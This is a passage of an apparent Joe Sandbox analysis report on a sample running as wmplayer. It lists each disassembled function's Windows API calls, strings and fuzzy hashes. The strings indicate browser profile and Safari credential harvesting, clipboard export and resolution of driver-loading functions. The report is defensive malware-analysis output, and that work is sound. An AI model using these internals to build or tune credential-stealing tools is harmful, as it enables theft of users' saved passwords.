                                                                                            • GetLastError.KERNEL32 ref: 0040995D
                                                                                            • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                            • GetLastError.KERNEL32 ref: 00409974
                                                                                            • CloseClipboard.USER32 ref: 0040997D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                            • String ID:
                                                                                            • API String ID: 3604893535-0
                                                                                            • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                            • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                            • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                            • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                            Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • EmptyClipboard.USER32 ref: 00409882
                                                                                            • wcslen.MSVCRT ref: 0040988F
                                                                                            • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                            • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                            • CloseClipboard.USER32 ref: 004098D7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                            • String ID:
                                                                                            • API String ID: 1213725291-0
                                                                                            • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                            • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                            • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                            • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                            Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32 ref: 004182D7
                                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                            • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                            • LocalFree.KERNEL32(?), ref: 00418342
                                                                                            • free.MSVCRT ref: 00418370
                                                                                              • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                                              • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                            • String ID: OsError 0x%x (%u)
                                                                                            • API String ID: 2360000266-2664311388
                                                                                            • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                            • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                            • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                            • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                            Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Version
                                                                                            • String ID:
                                                                                            • API String ID: 1889659487-0
                                                                                            • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                            • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                            • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                            • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                            Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _wcsicmp.MSVCRT ref: 004022A6
                                                                                            • _wcsicmp.MSVCRT ref: 004022D7
                                                                                            • _wcsicmp.MSVCRT ref: 00402305
                                                                                            • _wcsicmp.MSVCRT ref: 00402333
                                                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                            • memset.MSVCRT ref: 0040265F
                                                                                            • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                            • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                            • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                            • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                            • API String ID: 577499730-1134094380
                                                                                            • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                            • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                            • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                            • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                            Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                            • String ID: :stringdata$ftp://$http://$https://
                                                                                            • API String ID: 2787044678-1921111777
                                                                                            • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                            • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                            • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                            • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                            Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                            • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                            • GetDC.USER32 ref: 004140E3
                                                                                            • wcslen.MSVCRT ref: 00414123
                                                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                            • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                            • _snwprintf.MSVCRT ref: 00414244
                                                                                            • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                            • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                            • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                            • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                            • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                            • String ID: %s:$EDIT$STATIC
                                                                                            • API String ID: 2080319088-3046471546
                                                                                            • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                            • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                            • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                            • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                            Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • EndDialog.USER32(?,?), ref: 00413221
                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                            • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                            • memset.MSVCRT ref: 00413292
                                                                                            • memset.MSVCRT ref: 004132B4
                                                                                            • memset.MSVCRT ref: 004132CD
                                                                                            • memset.MSVCRT ref: 004132E1
                                                                                            • memset.MSVCRT ref: 004132FB
                                                                                            • memset.MSVCRT ref: 00413310
                                                                                            • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                            • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                            • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                            • memset.MSVCRT ref: 004133C0
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                            • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                            • wcscpy.MSVCRT ref: 0041341F
                                                                                            • _snwprintf.MSVCRT ref: 0041348E
                                                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                            • SetFocus.USER32(00000000), ref: 004134B7
                                                                                            Strings
                                                                                            • {Unknown}, xrefs: 004132A6
                                                                                            • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                            • API String ID: 4111938811-1819279800
                                                                                            • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                            • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                            • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                            • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                            Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                            • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                            • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                            • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                            • EndDialog.USER32(?,?), ref: 0040135E
                                                                                            • DeleteObject.GDI32(?), ref: 0040136A
                                                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                            • ShowWindow.USER32(00000000), ref: 00401398
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                            • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                            • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                            • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                            • String ID:
                                                                                            • API String ID: 829165378-0
                                                                                            • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                            • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                            • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                            • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                            Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00404172
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            • wcscpy.MSVCRT ref: 004041D6
                                                                                            • wcscpy.MSVCRT ref: 004041E7
                                                                                            • memset.MSVCRT ref: 00404200
                                                                                            • memset.MSVCRT ref: 00404215
                                                                                            • _snwprintf.MSVCRT ref: 0040422F
                                                                                            • wcscpy.MSVCRT ref: 00404242
                                                                                            • memset.MSVCRT ref: 0040426E
                                                                                            • memset.MSVCRT ref: 004042CD
                                                                                            • memset.MSVCRT ref: 004042E2
                                                                                            • _snwprintf.MSVCRT ref: 004042FE
                                                                                            • wcscpy.MSVCRT ref: 00404311
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                            • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                            • API String ID: 2454223109-1580313836
                                                                                            • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                            • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                            • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                            • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                            Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                            • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                            • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                            • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                            • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                            • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                            • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                            • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                            • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                            • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                            • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                            • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                              • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                              • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                            • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                            • API String ID: 4054529287-3175352466
                                                                                            • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                            • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                            • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                            • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                            Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                            • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                            • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                            • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                            • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                            • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                            • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                            • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                            • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule
                                                                                            • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                            • API String ID: 667068680-2887671607
                                                                                            • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                            • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                            • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                            • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                            Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                            • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                            • API String ID: 1607361635-601624466
                                                                                            • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                            • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                            • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                            • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                            Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintf$memset$wcscpy
                                                                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                            • API String ID: 2000436516-3842416460
                                                                                            • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                            • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                            • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                            • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                            Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                              • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                              • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                              • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                            • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                            • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
